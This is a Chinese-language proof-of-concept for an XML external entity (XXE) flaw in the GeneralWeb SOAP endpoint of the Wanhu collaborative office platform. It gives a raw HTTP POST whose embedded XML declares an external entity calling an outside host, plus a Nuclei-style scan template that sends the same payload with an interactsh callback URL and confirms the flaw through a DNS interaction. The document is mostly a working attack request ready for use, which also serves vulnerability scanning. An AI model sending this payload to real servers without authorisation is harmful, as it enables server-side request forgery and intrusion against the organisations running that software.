万户协同办公平台GeneralWeb_XXE漏洞POC

POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1Host: User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Connection: closeContent-Length: 453Content-Type: text/xml;charset=UTF-8SOAPAction: Accept-Encoding: gzip, deflate, br<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">  <soapenv:Body>    <gen:OAManager>      <gen:input>        &lt;?xml version="1.0" encoding="UTF-8"?&gt;        &lt;!DOCTYPE root [        &lt;!ENTITY x SYSTEM "http://xxxx.com"&gt;]&gt;        &lt;root&gt;&amp;x;&lt;/root&gt;      </gen:input>    </gen:OAManager>  </soapenv:Body></soapenv:Envelope>

id: wanhu-GeneralWeb-XXEinfo:  name: 万户协同办公平台GeneralWeb_XXE漏洞  author: 小白菜  severity: critical  description: |  metadata:    fofa-query:   reference:    - https://  tags: autohttp:  - raw:      - |          POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1          Host: {{Hostname}}          User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1          Content-Type: text/xml;charset=UTF-8          SOAPAction:           Content-Length: 457          <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">            <soapenv:Body>              <gen:OAManager>                <gen:input>                  &lt;?xml version="1.0" encoding="UTF-8"?&gt;                  &lt;!DOCTYPE root [                  &lt;!ENTITY x SYSTEM "http://{{interactsh-url}}"&gt;]&gt;                  &lt;root&gt;&amp;x;&lt;/root&gt;                </gen:input>              </gen:OAManager>            </soapenv:Body>          </soapenv:Envelope>    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol  # Confirms the DNS Interaction        words:          - "dns"